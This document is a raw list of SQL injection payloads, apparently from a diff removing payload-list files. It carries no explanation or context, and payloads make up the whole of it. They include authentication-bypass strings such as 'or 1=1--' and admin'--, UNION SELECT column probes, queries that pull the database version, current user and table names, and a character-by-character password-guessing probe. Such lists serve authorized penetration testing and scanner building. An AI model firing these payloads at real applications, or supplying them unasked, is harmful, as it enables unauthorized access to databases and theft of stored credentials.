||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
